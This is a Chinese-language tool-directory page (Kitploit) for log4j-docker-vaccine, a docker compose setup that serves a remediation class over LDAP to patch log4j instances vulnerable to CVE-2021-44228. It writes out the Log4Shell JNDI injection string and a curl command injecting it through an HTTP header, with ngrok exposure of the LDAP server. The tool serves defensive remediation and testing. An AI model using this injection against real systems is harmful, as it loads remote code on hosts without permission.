Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
log4j-docker-vaccine — 用于运行 log4j2 漏洞 CVE-2021-44228 疫苗环境的 docker compose 解决方案 | Kitploit
工具/GitHubGitHub/jeffbryner/log4j-docker-vaccine
容器安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubjeffbryner/log4j-docker-vaccine

log4j-docker-vaccine

用于运行 log4j2 漏洞 CVE-2021-44228 疫苗环境的 docker compose 解决方案

查看仓库
24年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Log4j Docker 疫苗

一种容器化运行由 Cybereason 提供的 log4j 疫苗的方式

  • https://github.com/Cybereason/Logout4Shell

开始使用

克隆此仓库:

root@kitploit:~
git clone https://github.com/jeffbryner/log4j-docker-vaccine.git

编辑 containers.env 文件,填入目标可以访问的准确的私有或公共 IP/DNS。默认条目很可能不适合你!

构建并运行容器:

root@kitploit:~
docker-compose -f docker-compose.yml -p vaccine up

现在你有一个正在监听的 ldap 服务器,它将提供 Log4jRCE 类,用于对易受攻击的 log4j 实例进行免疫。

你可以通过 ngrok 将此服务暴露到互联网(如果你愿意)。

  • https://dashboard.ngrok.com/get-started/setup
root@kitploit:~
ngrok tcp 1389

你可以使用臭名昭著的 jndi 输入字符串将易受攻击的 log4j 实例发送到此处:

root@kitploit:~
${jndi:ldap://<ngrokurlgoeshere>:1389/a}

测试

有一个故意带有漏洞版本的 log4j 容器可用,地址为:

  • https://github.com/christophetd/log4shell-vulnerable-app

你可以按照他们的说明启动它并进行测试:

root@kitploit:~
docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app vulnerable-app

并通过以下命令触发免疫:

root@kitploit:~
curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-ip-address-or-dns-name:1389/a'
下载工具